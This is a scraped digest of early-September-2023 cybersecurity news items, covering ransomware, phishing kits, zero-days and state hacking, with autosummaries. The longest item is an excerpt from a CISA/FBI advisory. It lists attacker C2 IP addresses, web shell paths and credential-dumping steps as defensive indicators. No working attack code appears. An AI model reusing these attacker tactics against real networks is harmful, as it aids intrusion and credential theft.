            The technology giant's stock market valuation has fallen by almost $200bn in the last two days.



            Cybersecurity pros battle discontent amid skills shortage

            ciber
            2023-09-07 https://www.helpnetsecurity.com/2023/09/07/cybersecurity-pros-discontent-skills-shortage/

            The cybersecurity skills crisis continues in a multi-year freefall that has impacted 71% of organizations and left two-thirds of cybersecurity professionals stating that the job has become more difficult over the past two years, while 60% of organizations continue to deflect responsibility, according to a new report from ESG and ISSA. A career in cybersecurity is becoming more difficult in an increasingly challenging environment: 66% of respondents believe that working as a cybersecurity professional has become …


            Autosummary: The global cybersecurity skills shortage continues unabated: 71% of organizations report that the cybersecurity skills shortage has impacted them, a dramatic increase from 57% in the last study, leading to an increased workload for the cybersecurity team (61%), unfilled open job requisitions (49%), and high burnout among staff (43%), according to respondents.


            LibreOffice: Stability, security, and continued development

            ransomware
            2023-09-07 https://www.helpnetsecurity.com/2023/09/07/libreoffice-security-development/

            LibreOffice, the most widely used open-source office productivity suite, has plenty to recommend it: it's feature-rich, user-friendly, well-documented, reliable, has an active community of developers working on improving it, and it's free. The suite includes Writer (word processor), Calc (a spreadsheet app), Impress (a presentation app), Draw (graphics editor), Math (app for creating and editing mathematical formulas), and Base (database management software). Its development is shepherded by The Document Foundation (TDF), a German non-profit organization …


            Autosummary: "This effort was coupled with the creation of an infrastructure to serve the developers, with the implementation of tools such as Gerrit for code review, Git for continuous integration, a battery of Tinderboxes, Bugzilla for quality assurance, OpenGrok for source code research, Weblate for localization, as well as testing for performance and crash analysis," he explained. "On the downstream side, open-source projects that integrate components developed by The Document Foundation, e.g., import filters for some proprietary formats (such as Microsoft Publisher and Visio, Apple Keynote, etc.), rely on the professionalism of LibreOffice developers.


            How cybercriminals use look-alike domains to impersonate brands

            ciber
            2023-09-07 https://www.helpnetsecurity.com/2023/09/07/cybercriminals-use-look-alike-domains-impersonate-brands-video/

            Cybercriminals create hundreds of thousands of counterfeit domains that mimic well-known brands for financial gain. These fake domains serve multiple malicious purposes, such as sending phishing emails, hosting fraudulent websites, rerouting web traffic, and distributing malware. In this Help Net Security video, Eric George, Director of Solution Engineering at Fortra, discusses why brands should take domain impersonation threats seriously and how security teams can counteract this issue.




            MacOS malware has a new trick up its sleeve

            exploits
            2023-09-07 https://www.helpnetsecurity.com/2023/09/07/macos-malware-bypass-gatekeeper/

            A newer version of the Atomic Stealer macOS malware has a new trick that allows it to bypass the operating system's Gatekeeper, Malwarebytes researchers have discovered. Mac malware delivered through Google ads: The malware, which was first advertised in April 2023, is an infostealer that can grab passwords from browsers, Apple's keychain, files, crypto wallets, and more. "Criminals who buy the toolkit have been distributing it mostly via cracked software downloads but are also impersonating …


            Autosummary: Mac malware delivered through Google ads: The malware, which was first advertised in April 2023, is an infostealer that can grab passwords from browsers, Apple's keychain, files, crypto wallets, and more.


            Mirai Botnet Variant "Pandora" Hijacks Android TVs for Cyberattacks

            ciber
            2023-09-07 https://thehackernews.com/2023/09/mirai-botnet-variant-pandora-hijacks.html
            A Mirai botnet variant called Pandora has been observed infiltrating inexpensive Android-based TV sets and TV boxes and using them as part of a botnet to perform distributed denial-of-service (DDoS) attacks. Doctor Web said the compromises are likely to occur either during malicious firmware updates or when applications for viewing pirated video content are installed. "It is likely that this



            Johnson & Johnson discloses IBM data breach impacting patients

            financial
            2023-09-07 https://www.bleepingcomputer.com/news/security/johnson-and-johnson-discloses-ibm-data-breach-impacting-patients/
            Johnson & Johnson Health Care Systems ("Janssen") has informed its CarePath customers that their sensitive information has been compromised in a third-party data breach involving IBM. [...]

            Autosummary: Unfortunately, the investigation that was concluded on August 2nd, 2023, showed that unauthorized users accessed the following CarePath user details: full name, contact information, date of birth, health insurance information, medication information, and medical condition information. The exposure impacts CarePath users who enrolled on Janssen's online services before July 2nd, 2023, which might indicate that the breach occurred on that date or the breached database was a backup.


            US and UK sanction 11 TrickBot and Conti cybercrime gang members

            ransomware
            2023-09-07 https://www.bleepingcomputer.com/news/security/us-and-uk-sanction-11-trickbot-and-conti-cybercrime-gang-members/
            The USA and the United Kingdom have sanctioned eleven Russian nationals associated with the TrickBot and Conti ransomware cybercrime operations. [...]

            Autosummary: The US has previously sanctioned numerous individuals for their involvement in ransomware operations, including CryptoLocker, SamSam, WannaCry, Evil Corp, REvil, and BlackShadow/Pay2Key. Ultimately, these leaks led to the shutdown of the Conti ransomware operation, which has now splintered into numerous other ransomware operations, such as Royal, Black Basta, and ZEON.


            Google Looker Studio abused in cryptocurrency phishing attacks

            financial
            2023-09-07 https://www.bleepingcomputer.com/news/security/google-looker-studio-abused-in-cryptocurrency-phishing-attacks/
            Cybercriminals are abusing Google Looker Studio to create counterfeit cryptocurrency phishing websites that phish digital asset holders, leading to account takeovers and financial losses. [...]

            Autosummary: [Image: Phishing email (Check Point)] Clicking on the URL leads victims to phishing pages that host a Google Slideshow promising cryptocurrency winnings, but on this step, the amount has been raised to 1.35 BTC ($34,700).


            Microsoft: North Korean hackers target Russian govt, defense orgs

            rusia-ucrania
            2023-09-07 https://www.bleepingcomputer.com/news/security/microsoft-north-korean-hackers-target-russian-govt-defense-orgs/
            Microsoft says North Korean hacking groups have breached multiple Russian government and defense targets since the start of the year. [...]

            Autosummary: [Image: North Korean defense targeting (Microsoft)] Defense firms in Brazil, Czechia, Finland, Italy, Norway, and Poland have also been subject to these intrusions, all as part of a coordinated endeavor to enhance the country's military capabilities.


            Apple discloses 2 new zero-days exploited to attack iPhones, Macs

            exploits
            2023-09-07 https://www.bleepingcomputer.com/news/apple/apple-discloses-2-new-zero-days-exploited-to-attack-iphones-macs/
            Apple released emergency security updates to fix two new zero-day vulnerabilities exploited in attacks targeting iPhone and Mac users, for a total of 13 exploited zero-days patched since the start of the year. [...]



            Google: State hackers attack security researchers with new zero-day

            exploits government
            2023-09-07 https://www.bleepingcomputer.com/news/security/google-state-hackers-attack-security-researchers-with-new-zero-day/
            Google's Threat Analysis Group (TAG) says North Korean state hackers are again targeting security researchers in attacks using at least one zero-day in an undisclosed popular software. [...]

            Autosummary: [Image: Attacker-controlled Twitter account (Google TAG)] Under attack since at least January 2021: This campaign is similar to a previous one exposed in January 2021 that also used Twitter and other social media platforms like LinkedIn, Telegram, Discord, and Keybase as the initial contact vector, presumably orchestrated by the same actors.


            CISA warns of critical Apache RocketMQ bug exploited in attacks

            exploits
            2023-09-07 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-apache-rocketmq-bug-exploited-in-attacks/
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added to its catalog of known exploited vulnerabilities (KEV) a critical-severity issue tracked as CVE-2023-33246 that affects Apache's RocketMQ distributed messaging and streaming platform. [...]

            Autosummary: Although they display suspicious behavior, some of the executables dropped after exploiting RocketMQ are currently not detected as malicious by antivirus engines on the VirusTotal scanning platform. The samples' dubious conduct on a system includes deleting themselves, running commands to modify permissions, enumerating processes, dumping credentials, reading the SSH private keys and the "known_hosts" file, encoding and encrypting data, and reading the bash history.


            Iranian hackers breach US aviation org via Zoho, Fortinet bugs

            exploits
            2023-09-07 https://www.bleepingcomputer.com/news/security/iranian-hackers-breach-us-aviation-org-via-zoho-fortinet-bugs/
            State-backed hacking groups have breached a U.S. aeronautical organization using exploits targeting critical Zoho and Fortinet vulnerabilities, a joint advisory published by CISA, the FBI, and the United States Cyber Command (USCYBERCOM) revealed on Thursday. [...]

            Autosummary: "CISA, FBI, and CNMF confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network," reads the advisory.


            Google is enabling Chrome real-time phishing protection for everyone

            financial
            2023-09-07 https://www.bleepingcomputer.com/news/google/google-is-enabling-chrome-real-time-phishing-protection-for-everyone/
            Google announced today that it is deprecating the standard Google Chrome Safe Browsing feature and moving everyone to its Enhanced Safe Browsing feature in the coming weeks, bringing real-time phishing protection to all users while browsing the web. [...]

            Autosummary: [Image: Enhanced Safe Browsing feature in Google Chrome settings. Source: BleepingComputer] This feature, though, comes with a tradeoff in privacy, as Google Chrome will now send URLs you open (including downloads) back to Google's servers to check if they are malicious.


            Apple zero-click iMessage exploit used to infect iPhones with spyware

            exploits
            2023-09-07 https://www.bleepingcomputer.com/news/security/apple-zero-click-imessage-exploit-used-to-infect-iphones-with-spyware/
            Citizen Lab says two zero-days fixed by Apple today in emergency security updates were actively abused as part of a zero-click exploit chain to deploy NSO Group's Pegasus commercial spyware onto fully patched iPhones. [...]


            A history of ransomware: How did it get this far?

            exploits ransomware
            2023-09-07 https://www.malwarebytes.com/blog/news/2023/09/history-of-ransomware-and-how-did-it-get-this-far

            Categories: News, Ransomware

            Tags: history, ransomware, bulletproof hosting, cryptocurrency, encryption, fast internet, government protection, RaaS, LockBit, pentester tools, code

            We tell you about the origin of ransomware and what factors contributed to making it the most feared type of malware.


            The post A history of ransomware: How did it get this far? appeared first on Malwarebytes Labs.

            "

            Autosummary: Here are a few ways: No more snail mail and floppy disks These days, popular delivery methods for ransomware are malspam, malvertising, and vulnerabilities in popular software or networking devices.Penetration testing, or pen testing, is the practice of running controlled attacks on a computer system, network, software, or other application in an attempt to find unpatched vulnerabilities or flaws.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Ransomware as a service The ransomware as a service (RaaS) model—where ransomware gangs “rent out” their technology on a subscription basis to other groups—makes it possible to scale operations and divide the workload in an effective way. "


            Thousands of dollars stolen from Texas ATMs using Raspberry Pi

            financial
            2023-09-07 https://www.tripwire.com/state-of-security/thousands-dollars-stolen-texas-atms-using-raspberry-pi
            A Texas court has heard how last month a gang of men used a Raspberry Pi device to steal thousands of dollars from ATMs. Read more in my article on the Tripwire State of Security blog.

            Autosummary: The men - 38-year-old Abel Valdes, 41-year-old Yordanesz Sanchez, and 33-year-old Carlos Jordano Herrera-Ruiz - were arrested on August 3 in a hotel room, where a number of Raspberry Pis and other evidence was recovered.


            Mac Users Beware: Malvertising Campaign Spreads Atomic Stealer macOS Malware

            exploits
            2023-09-07 https://thehackernews.com/2023/09/mac-users-beware-malvertising-campaign.html
            A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called Atomic Stealer (or AMOS), indicating that it’s being actively maintained by its author. An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering

            Autosummary: The macOS payload ("TradingView.dmg") is a new version of Atomic Stealer released at the end of June, which is bundled in an ad-hoc signed app that, once executed, prompts users to enter their password on a fake prompt and harvests files as well as data stored in iCloud Keychain and web browsers.


            The State of the Virtual CISO Report: MSP/MSSP Security Strategies for 2024

            government
            2023-09-07 https://thehackernews.com/2023/09/the-state-of-virtual-ciso-report.html
            By the end of 2024, the number of MSPs and MSSPs offering vCISO services is expected to grow by almost 5-fold, as can be seen in figure 1. This incredible surge reflects the growing business demand for specialized cybersecurity expertise and the lucrative opportunities for MSPs and MSSPs in vCISO services. (Figure 1: Timeline for offering vCISO services.) The State of the Virtual CISO Survey Report

            Autosummary: (Figure 2: Top benefits of adding vCISO services to the MSP/MSSP offering. Figure 3: Top challenges for MSPs/MSSPs in providing vCISO services.) The Challenging Path to vCISO Services: yet, the road to vCISO success is not without obstacles, as can be seen in figure 3. Hiring Cybersecurity Experts is a Key Blocker to Offering vCISO Services: 91%, nearly all, respondents believe that offering vCISO services requires the expansion of their cybersecurity team.


            Avoidable digital certificate issues fuel data breaches

            financial
            2023-09-06 https://www.helpnetsecurity.com/2023/09/06/digital-certificates-issues/

            Among organizations that have suffered data breaches, 58% were caused by issues related to digital certificates, according to a report by AppViewX and Forrester Consulting. As a result of service outages, 57% said their organizations have incurred costs upwards of $100,000 per outage. According to the Forrester study, “Enterprise organizations have traditionally been less focused on managing machine identities compared to human ones, partly because they have different requirements and more complicated lifecycle and security … More

            The post Avoidable digital certificate issues fuel data breaches appeared first on Help Net Security.

            "

            Autosummary: "


            W3LL phishing kit hijacks thousands of Microsoft 365 accounts, bypasses MFA

            financial
            2023-09-06 https://www.bleepingcomputer.com/news/security/w3ll-phishing-kit-hijacks-thousands-of-microsoft-365-accounts-bypasses-mfa/
            A threat actor known as W3LL developed a phishing kit that can bypass multi-factor authentication along with other tools that compromised more than 8,000 Microsoft 365 corporate accounts. [...]

            Autosummary: For this to happen, W3LL Panel needs to go through several steps, which include: pass CAPTCHA verification; set up the correct fake login page; validate the victim's account; obtain the target organization’s brand identity; get the cookies for the login process; identify the type of account; validate the password; obtain the one-time-passcode (OTP); get an authenticated session cookie. After the W3LL Panel gets the authentication session cookie, the account is compromised and the victim is shown a PDF document, to make the login request appear legitimate. “W3LL’s major weapon, W3LL Panel, may be considered one of the most advanced phishing kits in class, featuring adversary-in-the-middle functionality, API, source code protection, and other unique capabilities” - Group-IB. W3LL arsenal for BEC attacks: apart from W3LL Panel, which was designed to bypass multi-factor authentication (MFA), the actor provides 16 more tools, all primed for BEC attacks.


            W3LL Store: How a Secret Phishing Syndicate Targets 8,000+ Microsoft 365 Accounts

            financial
            2023-09-06 https://thehackernews.com/2023/09/w3ll-store-how-secret-phishing.html
            A previously undocumented "phishing empire" has been linked to cyber attacks aimed at compromising Microsoft 365 business email accounts over the past six years. "The threat actor created a hidden underground market, named W3LL Store, that served a closed community of at least 500 threat actors who could purchase a custom phishing kit called W3LL Panel, designed to bypass MFA, as well as 16

            Autosummary: The phishing infrastructure is estimated to have targeted more than 56,000 corporate Microsoft 365 accounts and compromised at least 8,000 of them, primarily in the U.S., the U.K., Australia, Germany, Canada, France, the Netherlands, Switzerland, and Italy between October 2022 and July 2023, netting its operators $500,000 in illicit profits.


            Ukraine"s CERT Thwarts APT28"s Cyberattack on Critical Energy Infrastructure

            industry ciber
            2023-09-06 https://thehackernews.com/2023/09/ukraines-cert-thwarts-apt28s.html
            The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday said it thwarted a cyber attack against an unnamed critical energy infrastructure facility in the country. The intrusion, per the agency, started with a phishing email containing a link to a malicious ZIP archive that activates the infection chain. “Visiting the link will download a ZIP archive containing three JPG images (

            Autosummary: "Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file "weblinks.cmd" to the victim's computer," CERT-UA said, attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE).


            Cybercriminals target MS SQL servers to deliver ransomware

            exploits ransomware ciber
            2023-09-06 https://www.helpnetsecurity.com/2023/09/06/ms-sql-cyberattack/

            A cyberattack campaign is targeting exposed Microsoft SQL (MS SQL) databases, aiming to deliver ransomware and Cobalt Strike payloads. The attack campaign: the attackers target exposed MS SQL servers by brute-forcing access credentials. After having successfully authenticated, they start enumerating the database. A (too often) enabled xp_cmdshell function also allows attackers to run shell commands on the host and launch several payloads. Attackers then: create new users on the victim host; make registry changes to … More

            The post Cybercriminals target MS SQL servers to deliver ransomware appeared first on Help Net Security.

            "

            Autosummary: MS SQL servers under attack Trustwave has recently deployed honeypot servers mimicking nine popular database systems – MS SQL Server, MySQL, Redis, MongoDB, PostgreSQL, Oracle DB, IBM DB2, Cassandra, and Couchbase – in key regions of the world, and quickly discovered that attack activity on MS SQL honeypots accounted for 93% of the total. "


            Zero-Day Alert: Latest Android Patch Update Includes Fix for Newly Actively Exploited Flaw

            exploits
            2023-09-06 https://thehackernews.com/2023/09/zero-day-alert-latest-android-patch.html
            Google has rolled out monthly security patches for Android to address a number of flaws, including a zero-day bug that it said may have been exploited in the wild. Tracked as CVE-2023-35674, the high-severity vulnerability is described as a case of privilege escalation impacting the Android Framework. “There are indications that CVE-2023-35674 may be under limited, targeted exploitation,” the


            Alert: Phishing Campaigns Deliver New SideTwist Backdoor and Agent Tesla Variant

            financial
            2023-09-06 https://thehackernews.com/2023/09/alert-phishing-campaigns-deliver-new.html
            The Iranian threat actor tracked as APT34 has been linked to a new phishing attack that leads to the deployment of a variant of a backdoor called SideTwist. “APT34 has a high level of attack technology, can design different intrusion methods for different types of targets, and has supply chain attack capability,” NSFOCUS Security Labs said in a report published last week. APT34, also known by

            Autosummary: APT34, also known by the names Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, has a track record of targeting telecommunications, government, defense, oil and financial services verticals in the Middle East since at least 2014 via spear-phishing lures that culminate in the deployment of various backdoors.


            MSI BIOS updates fix Windows unsupported processor BSOD bug

            exploits
            2023-09-06 https://www.bleepingcomputer.com/news/software/msi-bios-updates-fix-windows-unsupported-processor-bsod-bug/
            MSI has released BIOS updates to fix a known issue that triggers blue screens of death on Windows computers after installing August 2023 preview updates. [...]


            September Android updates fix zero-day exploited in attacks

            exploits
            2023-09-06 https://www.bleepingcomputer.com/news/security/september-android-updates-fix-zero-day-exploited-in-attacks/
            The September 2023 Android security updates tackle 33 vulnerabilities, including a zero-day bug currently targeted in the wild. [...]

            Autosummary: Two security patch levels: as usual, Google issued two sets of patches for September 2023, tagged as the 2023-09-01 and 2023-09-05 security patch levels.


            How SMEs can use Wazuh to improve cybersecurity

            ciber
            2023-09-06 https://www.bleepingcomputer.com/news/security/how-smes-can-use-wazuh-to-improve-cybersecurity/
            Cybersecurity has become a crucial concern for all businesses in today's digital era. Learn from Wazuh on how small and medium-sized enterprises can use its open-source solution to improve their cybersecurity. [...]

            Autosummary: Wazuh is a free and open source security monitoring solution that provides unified XDR and SIEM capabilities for incident response, threat detection, file integrity monitoring, and compliance management. SMEs can easily extend their security capabilities by integrating Wazuh with other security technologies, such as security orchestrators, threat intelligence feeds, and incident management platforms. Enhanced threat detection and simplified incident response: as a comprehensive SIEM and XDR solution, Wazuh provides advanced threat detection capabilities that empower organizations to monitor, detect and respond to potential threats to endpoints and data.


            University of Michigan requires password resets after cyberattack

            ciber
            2023-09-06 https://www.bleepingcomputer.com/news/security/university-of-michigan-requires-password-resets-after-cyberattack/
            The University of Michigan (UMICH) warned staff and students on Tuesday that they're required to reset their account passwords after a recent cyberattack. [...]

            Autosummary: "Everyone on the Ann Arbor, Flint, Dearborn, and Michigan Medicine campuses must change their passwords by Tuesday, September 12," the university's ITS Service Center (ITS) also warns.


            Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

            exploits government
            2023-09-06 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a

            SUMMARY

            The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.

            CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

            Download the PDF version of this report:

            For a downloadable copy of IOCs, see:

            AA23-250A STIX XML (XML, 69.24 KB)

            Autosummary: CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors. Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13.

            Initial Access Vector 1: As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]: c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx. Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment.

            Initial Access Vector 2: Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses: 144.202.2[.]71, 207.246.105[.]240, 45.77.121[.]232, 47.90.240[.]218. APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded (among other locations, such as the OWA server).

            Forensic Timeline of APT Actor Activity: Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. 2023-02-08 08:56:35, 2023-02-09 20:19:59, 2023-03-04, 2023-03-18: Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226 ([REDACTED]/wp-content/plugins/ioptimization/IOptimize.php, 4 instances). 2023-03-06 06:49:40, Interact.sh: APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [T1046].

            Tools: quser.exe is a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8] APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack): c:\ProgramFiles\WindowsApps\Microsoft. Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations: c:\windows\system32\ssh-shellhost.exe, c:\windows\system32\ssh-agent.exe, c:\windows\system32\ssh-add.exe. While the files were not identified as malicious, they were loaded for malicious purposes. In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6] Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems. In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files [T1003.002]: sam.hiv, system.hiv, security.hiv. These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files: wo_view_bg.zip (09:06:37 UTC), wo_view_bg1.gif (09:08:11 UTC), wo_view_bg2.gif (09:19:43 UTC).

            Manage Accounts, Permissions, and Workstations: APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. … [DS0002], as well as monitor executed commands and arguments for actions that are associated with local account creation, such as , , and [DS0017]. … alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Secure Remote Access Software: Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. Organizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZ.

            Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.


            Government denies U-turn on encrypted messaging row

            government
            2023-09-06 https://www.bbc.co.uk/news/technology-66716502?at_medium=RSS&at_campaign=KARANGA
            The government states that the tech tools for accessing private messages don't yet exist.


            6 free resources for getting started in cybersecurity

            ciber
            2023-09-05 https://www.helpnetsecurity.com/2023/09/05/free-resources-getting-started-in-cybersecurity/

            Cybersecurity is not just a career field on the rise – it’s a calling that’s increasingly vital to the infrastructure of our world. But stepping into the universe of threat vectors and intrusion detection systems might sound like a journey for the tech elite. The reality, however, is far more inclusive. Multiple avenues and entry points into the field cater to diverse skills and experiences. Jobs in cybersecurity aren’t merely tech-centric roles but multidimensional positions … More

            The post 6 free resources for getting started in cybersecurity appeared first on Help Net Security.

            "

            Autosummary: The NICE Framework is comprised of the following components: Categories (7) – A high-level grouping of common cybersecurity functions Specialty Areas (33) – Distinct areas of cybersecurity work Work Roles (52) – The most detailed groupings of cybersecurity work comprised of specific knowledge, skills, and abilities (KSAs) required to perform tasks in a Work Role W3Schools introductory course in cybersecurity This free course serves as a primer for the many different domains of cybersecurity. "


            LockBit ransomware gang steals data related to security of UK military bases

            exploits ransomware
            2023-09-05 https://grahamcluley.com/lockbit-ransomware-gang-steals-data-related-to-security-of-uk-military-bases/
            An attack by the notorious LockBit ransomware gang stole 10 GB of data from a company that provides high-security fencing for military bases.

            Autosummary: According to the firm, classified documents are not believed to have been included in the haul: “LockBit will have potentially gained access to some historic emails, orders, drawings and project files, we do not believe that any classified documents were stored on the system or have been compromised.”


            LockBit leaks sensitive data from maximum security fence manufacturer

            ransomware industry
            2023-09-05 https://www.helpnetsecurity.com/2023/09/05/zaun-breach/

            The LockBit ransomware group has breached Zaun, a UK-based manufacturer of fencing systems for military sites and critical utilities, by compromising a legacy computer running Windows 7 and using it as an initial point of access to the wider company network. The Zaun breach: the company said that the “sophisticated” cyberattack occurred on the 5th – 6th August. “In an otherwise up-to-date network, the breach occurred through a rogue Windows 7 PC that was running … More

            The post LockBit leaks sensitive data from maximum security fence manufacturer appeared first on Help Net Security.

            "

            Autosummary: Some of the stolen data was later leaked by LockBit on the dark web and, according to the Daily Mirror, among it were “thousands of pages of data which could help criminals get into the HMNB Clyde nuclear submarine base, the Porton Down chemical weapon lab and a GCHQ listening post.” "


            New BLISTER Malware Update Fuelling Stealthy Network Infiltration

            exploits
            2023-09-05 https://thehackernews.com/2023/09/new-blister-malware-update-fuelling.html
            An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic. “New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments,” Elastic Security Labs researchers Salim Bitam and Daniel


            New Python Variant of Chaes Malware Targets Banking and Logistics Industries

            financial exploits industry
            2023-09-05 https://thehackernews.com/2023/09/new-python-variant-of-chaes-malware.html
            Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes. "It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol," Morphisec said in a new detailed technical write-up shared with The Hacker

            Autosummary: Chrautos, an updated version of Chronod and Appita that focuses on gathering data from Mercado Libre, Mercado Pago, and WhatsApp; Stealer, an improved variant of Chrolog which plunders credit card data, cookies, autofill, and other information stored in web browsers; and File Uploader, which uploads data related to MetaMask's Chrome extension. Persistence on the host is accomplished by means of a scheduled task, while C2 communications entail the use of WebSockets, with the implant running in an infinite loop to await further instructions from the remote server.


            Key Cybersecurity Tools That Can Mitigate the Cost of a Breach

            ciber
            2023-09-05 https://thehackernews.com/2023/09/key-cybersecurity-tools-that-can.html
            IBM"s 2023 installment of their annual "Cost of a Breach" report has thrown up some interesting trends. Of course, breaches being costly is no longer news at this stage! What’s interesting is the difference in how organizations respond to threats and which technologies are helping reduce the costs associated with every IT team’s nightmare scenario.  The average cost of a breach rose once again "

            Autosummary: They also ranked among the top four costliest incident types ($4.76 million and $4.62 million) along with malicious insiders (at 6% but costing an average of $4.9 million) and business email compromise (at 9% with an average cost of $4.67 million). Our 2023 Cost of a Breach takeaway The takeaway of IBM"s 2023 Cost of a Breach report is clear: organizations with an understanding of where their vulnerabilities lie, accurate views of their attack surface, an effective incident response plan, and tools for dealing with compromised credentials will suffer fewer breaches.Additionally, 39% of breaches spanned multiple cloud environments (including public and private clouds), leading to a higher-than-average breach cost of $4.75 million. "


            Chaes malware now uses Google Chrome DevTools Protocol to steal data

            exploits
            2023-09-05 https://www.bleepingcomputer.com/news/security/chaes-malware-now-uses-google-chrome-devtools-protocol-to-steal-data/
            The Chaes malware has returned as a new, more advanced variant that includes a custom implementation of the Google DevTools protocol for direct access to the victim"s browser functions, allowing it to steal data using WebSockets. [...] "

            Autosummary: However, a new feature that stands out is Chaes' use of the Chrome DevTools Protocol to steal data from the web browser, including the real-time modification of web pages, execution of JavaScript code, debugging, network request management, memory management, cookie and cache management, and more.


            Atlas VPN zero-day allows sites to discover users’ IP address

            exploits
            2023-09-05 https://www.helpnetsecurity.com/2023/09/05/atlas-vpn-zero-day-vulnerability/

            Atlas VPN has confirmed the existence of a zero-day vulnerability that may allow website owners to discover Linux users’ real IP address. Details about this zero-day vulnerability as well as exploit code have been publicly released on Reddit several days ago by the person who discovered the flaw and purportedly first tried to privately share the discovery with Atlas VPN. About the Atlas VPN zero-day vulnerability Atlas VPN offers a “freemium” and paid “premium” VPN … More

            The post Atlas VPN zero-day allows sites to discover users’ IP address appeared first on Help Net Security.

            Autosummary: The company provides an app for Windows, macOS, Linux, Android, iOS, Android TV, and Amazon Fire TV.


            Coffee Meets Bagel says recent outage caused by destructive cyberattack

            ciber
            2023-09-05 https://www.bleepingcomputer.com/news/security/coffee-meets-bagel-says-recent-outage-caused-by-destructive-cyberattack/
            The Coffee Meets Bagel dating platform confirms last week's outage was caused by hackers breaching the company's systems and deleting company data. [...]

            Autosummary: At this time, Coffee Meets Bagel has not confirmed if the attack was ransomware that encrypted data, effectively making it unusable, or if the threat actors purposely deleted data to bring down the service.


            Atlas VPN zero-day vulnerability leaks users' real IP address

            exploits
            2023-09-05 https://www.bleepingcomputer.com/news/security/atlas-vpn-zero-day-vulnerability-leaks-users-real-ip-address/
            An Atlas VPN zero-day vulnerability affecting the Linux client leaks a user's real IP address simply by visiting a website. [...]

            Autosummary: In a proof of concept exploit shared on Reddit, a researcher describes how the Linux client of Atlas VPN, specifically the latest version, 1.0.3, has an API endpoint that listens on localhost (127.0.0.1) over port 8076. As the researcher stated, due to the vulnerability, the application and, hence, encrypted traffic between a user and the VPN gateway can be disconnected by a malicious actor.


            FreeWorld ransomware attacks MSSQL—get your databases off the Internet

            exploits ransomware
            2023-09-05 https://www.malwarebytes.com/blog/news/2023/09/freeworld-ransomware-attacks-via-mssql-take-your-databases-off-the-internet

